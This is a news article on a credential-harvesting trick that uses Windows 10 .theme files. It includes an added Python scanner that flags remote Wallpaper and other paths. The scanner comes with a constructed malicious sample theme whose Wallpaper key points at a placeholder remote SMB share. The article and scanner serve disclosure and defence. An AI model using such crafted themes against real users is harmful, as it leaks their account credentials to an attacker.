Changing your Windows theme seems innocent enough, and it’s good to refresh things every now and then. But you might want to be careful about what sources you use to get new themes. A security researcher demonstrated a method to modify Windows 10 themes to steal your Microsoft password.
As spotted by BleepingComputer, security researcher Jimmy Bayne (@bohops) showed that the process isn’t even difficult. It takes advantage of several Windows behaviors to perform a “Pass-the-Hash” attack.
In a “Pass-the-Hash” attack, bad actors don’t bother obtaining your password in the clear. They set up an attack that sends them your password in hashed form. They can then submit that hash for authentication to Microsoft (or whichever company the password belongs to), and since it matches, it works just as well as the plain-text password.
[Credential Harvesting Trick] Using a Windows .theme file, the Wallpaper key can be configured to point to an http/s resource required by remote authentication. When a user activates the theme file (e.g. opened from a link / attachment), a Windows credential prompt is shown to the user 1/4 pic.twitter.com/rgR3a9KP6Q
– bohops (@bohops) September 5, 2020
As Bayne explains, hackers can modify a Windows theme to force the operating system to attempt to connect to a remote SMB share that requires authentication. When Windows connects to a remote SMB share like this, it automatically submits the logged-in user’s credentials in order to connect.
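The mechanism described above lives in an ordinary INI-style .theme file, so the defensive counterpart is straightforward: inspect a theme before applying it and flag any value that points at a remote location (a UNC path or an http/s URL) rather than a local file. The script below is an added example for this article, not code from Bayne or from Microsoft; the two sample theme files it scans are constructed here, and the host name `remote-host.example` is a placeholder.

```python
import configparser
import re
from typing import List, Tuple

# Values that would make Windows reach out to another host when the theme is
# applied: UNC paths (\\host\share\..., or //host/share/...), http(s) URLs and
# file:// URLs. Local paths and %SystemRoot%-style paths do not match.
REMOTE_PATH = re.compile(r"^\s*(\\\\|//|https?://|file://)", re.IGNORECASE)


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse the INI-style contents of a Windows .theme file."""
    cp = configparser.ConfigParser(
        interpolation=None,      # values contain '%' (environment variables)
        strict=False,            # tolerate duplicated sections/keys
        delimiters=("=",),       # never split on ':' inside URLs
        allow_no_value=True,
    )
    cp.optionxform = str         # keep key names as written (e.g. "Wallpaper")
    cp.read_string(text)
    return cp


def find_remote_references(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every value that points off-host."""
    findings = []
    for section in parse_theme(text).sections():
        for key, value in parse_theme(text).items(section):
            if value is not None and REMOTE_PATH.match(value):
                findings.append((section, key, value.strip()))
    return findings


def is_suspicious(text: str) -> bool:
    """True if applying this theme would make Windows contact a remote host."""
    return bool(find_remote_references(text))


def scan_theme_file(path: str) -> List[Tuple[str, str, str]]:
    """Scan a .theme file on disk; such files are often UTF-16 with a BOM."""
    with open(path, "rb") as f:
        raw = f.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", errors="replace")
    return find_remote_references(text)


# Constructed sample: the Wallpaper key points at a remote share (placeholder host).
MALICIOUS_THEME = r"""
; constructed sample, not a real theme file
[Theme]
DisplayName=Sample Theme

[Control Panel\Desktop]
Wallpaper=\\remote-host.example\share\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""

# Constructed sample: every path is local, so nothing should be flagged.
BENIGN_THEME = r"""
; constructed sample, not a real theme file
[Theme]
DisplayName=Sample Theme

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""

if __name__ == "__main__":
    for name, theme in (("malicious", MALICIOUS_THEME), ("benign", BENIGN_THEME)):
        print(name, "->", find_remote_references(theme) or "no remote references")
```

Because the check is on the value prefix rather than on the key name, it also catches remote paths placed in keys other than Wallpaper (for example a slideshow image folder), which is why the scan walks every section instead of looking only at `[Control Panel\Desktop]`.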
Microsoft has moved on to online accounts with Windows 10 and is slowly pushing everyone to use them. If you sign in with your Microsoft account, that means your Microsoft username and hashed password are what get passed to the hacker.
Once a hacker has modified a theme this way, they can save it and upload it to websites that host Windows themes. You won’t know what hit you until it’s too late. Bayne reported the issue to Microsoft, but the company declined to fix it because the behavior is a “feature by design.”
Bayne offered a few solutions, but they involve breaking the theme component of Windows.
Once you’ve done that, you can’t switch themes again (until you undo the change). The safest thing you can do is turn on two-step authentication: if someone steals your password, they still won’t have everything they need to access your account.